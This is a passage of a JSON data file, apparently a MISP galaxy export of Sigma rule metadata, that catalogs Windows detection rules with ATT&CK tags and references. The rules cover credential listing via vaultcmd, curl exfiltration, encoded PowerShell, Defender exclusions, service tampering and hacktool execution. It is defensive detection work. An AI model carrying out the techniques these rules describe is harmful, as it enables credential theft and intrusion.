"2023-02-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_recon_csproduct.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.uptycs.com/blog/kuraystealer-a-bandit-using-discord-webhooks", "https://jonconwayuk.wordpress.com/2014/01/31/wmic-csproduct-using-wmi-to-identify-make-and-model-of-hardware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_csproduct.yml" ], "tags": [ "attack.execution", "attack.t1047", "car.2016-03-002" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d", "value": "Hardware Model Reconnaissance Via Wmic.EXE" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", "meta": { "author": "frack113", "creation_date": "2022-09-25", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_remote_access_tools_ultraviewer.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_ultraviewer.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "88656cec-6c3b-487c-82c0-f73ebb805503", "value": "Remote Access Tool - UltraViewer Execution" }, { "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-16", "falsepositive": [ "Legitimate use by an administrator" ], "filename": "proc_creation_win_lolbin_openconsole.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/nas_bench/status/1537563834478645252", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "814c95cc-8192-4378-a70a-f1aafd877af1", "value": "Use of OpenConsole" }, { "description": "Detects execution of \"curl.exe\" with a potential custom \"User-Agent\". 
Attackers can leverage this to download or exfiltrate data via \"curl\" to a domain that only accepts specific \"User-Agent\" strings
As seen being used in the POC NtdllPipe", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", "value": "NtdllPipe Like Activity Execution" }, { "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64 where the extensions of the file is suspicious", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_certutil_encode_susp_extensions.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior", "https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior", "https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior", "https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ea0cdc3e-2239-4f26-a947-4e8f8224e464", 
"value": "Suspicious File Encoded To Base64 Via Certutil.EXE" }, { "description": "Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-11", "falsepositive": [ "False positives are expected in cases in which ProcDump just gets copied to a different directory without any renaming" ], "filename": "proc_creation_win_sysinternals_procdump_evasion.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/mrd0x/status/1480785527901204481", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "79b06761-465f-4f88-9ef2-150e24d3d737", "value": "Potential SysInternals ProcDump Evasion" }, { "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-03-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_taskmgr_localsystem.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskmgr_localsystem.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9fff585c-c33e-4a86-b3cd-39312079a65f", "value": "Taskmgr as LOCAL_SYSTEM" }, { "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", "meta": { "author": "frack113", "creation_date": "2022-04-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_vaultcmd_list_creds.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vaultcmd_list_creds.yml" ], "tags": [ "attack.credential-access", "attack.t1555.004" ] }, "related": [ { "dest-uuid": "d336b553-5da9-46ca-98a8-0b23f49fb447", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "58f50261-c53b-4c88-bd12-1d71f12eda4c", "value": "Windows Credential Manager Access via VaultCmd" }, { "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh", "meta": { "author": "frack113", "creation_date": "2022-08-14", "falsepositive": [ "Legitimate administration activity", "Software installations and removal" ], "filename": "proc_creation_win_netsh_fw_delete_rule.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/8bbd5b4c-b82d-4e6d-a3ea-d454594a37cc/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_delete_rule.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", "value": "Firewall Rule Deleted Via Netsh.EXE" }, { "description": "Extract data from cab file and hide it in an alternate data stream", "meta": { "author": "frack113", "creation_date": "2021-11-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_extrac32_ads.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", "value": "Suspicious Extrac32 Alternate Data Stream Execution" }, { "description": "Commandline to launch powershell with a base64 payload", "meta": { "author": "frack113", "creation_date": "2022-01-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_encode.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets", "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_encode.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": 
"970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fb843269-508c-4b76-8b8d-88679db22ce7", "value": "Suspicious Execution of Powershell with Base64" }, { "description": "Detects usage of the \"ms-appinstaller\" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE\nThe downloaded files are temporarly stored in \":\\Users\\%username%\\AppData\\Local\\Packages\\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\\AC\\INetCache\\\"\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel", "creation_date": "2023-11-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_ms_appinstaller_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "180c7c5c-d64b-4a63-86e9-68910451bc8b", "value": "Potential File Download Via MS-AppInstaller Protocol Handler" }, { "description": "Detects suspicious child processes of electron apps (teams, discord, slack, etc.). 
This could be a potential sign of \".asar\" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_electron_app_children.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/", "https://github.com/mttaggart/quasar", "https://positive.security/blog/ms-officecmd-rce", "https://lolbas-project.github.io/lolbas/Binaries/Msedge/", "https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf", "https://taggart-tech.com/quasar-electron/", "https://lolbas-project.github.io/lolbas/Binaries/Teams/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml" ], "tags": [ "attack.execution" ] }, "uuid": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", "value": "Suspicious Electron Application Child Processes" }, { "description": "Detects a suspicious script executions from temporary folder", "meta": { "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", "creation_date": "2021-07-14", "falsepositive": [ "Administrative scripts" ], "filename": "proc_creation_win_susp_script_exec_from_temp.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", "value": "Suspicious Script Execution From Temp Folder" }, { "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", "meta": { "author": "frack113, Nasreddine Bencherchali", "creation_date": "2022-08-07", "falsepositive": [ "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." ], "filename": "proc_creation_win_susp_ntfs_short_name_path_use_cli.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)", "https://twitter.com/frack113/status/1555830623633375232", "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "349d891d-fef0-4fe4-bc53-eee623a15969", "value": "Use Short Name Path in Command Line" }, { "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-20", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_safetykatz.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/GhostPack/SafetyKatz", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_safetykatz.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b1876533-4ed5-4a83-90f3-b8645840a413", "value": "HackTool - SafetyKatz Execution" }, { "description": "Detects a suspicious process that is masquerading as the legitimate \"svchost.exe\" by naming its binary \"svchost.exe\" and executing from an uncommon location.\nAdversaries often disguise their malicious binaries by naming them after legitimate system processes like \"svchost.exe\" to evade detection.\n", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2024-08-07", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_svchost_masqueraded_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://tria.ge/240731-jh4crsycnb/behavioral2", "https://redcanary.com/blog/threat-detection/process-masquerading/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_svchost_masqueraded_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.005" ] }, "related": [ { "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "be58d2e2-06c8-4f58-b666-b99f6dc3b6cd", "value": "Suspicious Process Masquerading As SvcHost.EXE" }, { "description": "Detects password change for the computer's domain account or host principal via \"ksetup.exe\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_ksetup_password_change_computer.yml", "level": "medium", "logsource.category": 
"process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup", "https://twitter.com/Oddvarmoe/status/1641712700605513729", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ksetup_password_change_computer.yml" ], "tags": [ "attack.execution" ] }, "uuid": "de16d92c-c446-4d53-8938-10aeef41c8b6", "value": "Computer Password Change Via Ksetup.EXE" }, { "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113 , X__Junior", "creation_date": "2022-09-01", "falsepositive": [ "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" ], "filename": "proc_creation_win_susp_service_tamper.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1489" ] }, "related": [ { "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ce72ef99-22f1-43d4-8695-419dcb5d9330", "value": "Suspicious Windows Service Tampering" }, { "description": "Detects the execution of the BCP utility in order to export data from the database.\nAttackers were seen saving their malware to a database column or table and then later extracting it via \"bcp.exe\" into a file.\n", "meta": { "author": "Omar Khaled (@beacon_exe), MahirAli Khan (in/mahiralikhan), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-08-20", "falsepositive": [ "Legitimate data export operations." ], "filename": "proc_creation_win_bcp_export_data.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/", "https://www.huntress.com/blog/attacking-mssql-servers-pt-ii", "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", "https://docs.microsoft.com/en-us/sql/tools/bcp-utility", "https://www.huntress.com/blog/attacking-mssql-servers", "https://asec.ahnlab.com/en/61000/", "https://asec.ahnlab.com/en/78944/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bcp_export_data.yml" ], "tags": [ "attack.execution", "attack.t1048" ] }, "related": [ { "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c615d676-f655-46b9-b913-78729021e5d7", "value": "Data Export From MSSQL Table Via BCP.EXE" }, { 
"description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) child process", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-10-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wermgr_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", "https://github.com/binderlabs/DirCreate2System", "https://www.echotrail.io/insights/search/wermgr.exe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wermgr_susp_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055", "attack.t1036" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", "value": "Suspicious Child Process Of Wermgr.EXE" }, { "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-04-29", "falsepositive": [ "Possible Admin Activity", "Other Cmdlets that may use the same parameters" ], "filename": "proc_creation_win_powershell_defender_exclusion.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", 
"https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "17769c90-230e-488b-a463-e05c08e9d48f", "value": "Powershell Defender Exclusion" }, { "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-07-31", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_adcspwn.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/bats3c/ADCSPwn", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_adcspwn.yml" ], "tags": [ "attack.credential-access", "attack.t1557.001" ] }, "related": [ { "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd8c163e-a19b-402e-bdd5-419ff5859f12", "value": "HackTool - ADCSPwn Execution" }, { "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-22", "falsepositive": [ "Legitimate use of the PDQDeploy tool to execute these commands" ], "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml", "level": 
"medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/malmoeb/status/1550483085472432128", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml" ], "tags": [ "attack.execution" ] }, "uuid": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", "value": "Potentially Suspicious Execution Of PDQDeployRunner" }, { "description": "Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sysinternals_pssuspend_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend", "https://twitter.com/0gtweet/status/1638069413717975046", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml" ], "tags": [ "attack.discovery", "attack.persistence", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "48bbc537-b652-4b4e-bd1d-281172df448f", "value": "Sysinternals PsSuspend Execution" }, { "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", "meta": { "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-10-21", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_sc_service_path_modification.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "138d3531-8793-4f50-a2cd-f291b2863d78", "value": "Suspicious Service Path Modification" }, { "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", "meta": { "author": "elhoim", "creation_date": "2022-09-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_vmnat.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/malmoeb/status/1525901219247845376", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7b4f794b-590a-4ad4-ba18-7964a2832205", "value": "Renamed Vmnat.exe Execution" }, { "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-05-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_get_clipboard.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md", "https://github.com/OTRF/detection-hackathon-apt29/issues/16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml" ], "tags": [ "attack.collection", "attack.t1115" ] }, "related": [ { "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", "value": "PowerShell Get-Clipboard Cmdlet Via CLI" }, { "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", "meta": { "author": "frack113", "creation_date": "2022-12-25", "falsepositive": [ "Legitimate use of the library" ], "filename": "proc_creation_win_powershell_download_com_cradles.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57", "https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_com_cradles.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", "value": "Potential COM Objects Download Cradles Usage - Process Creation" }, { "description": "Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation\n", "meta": { "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach 
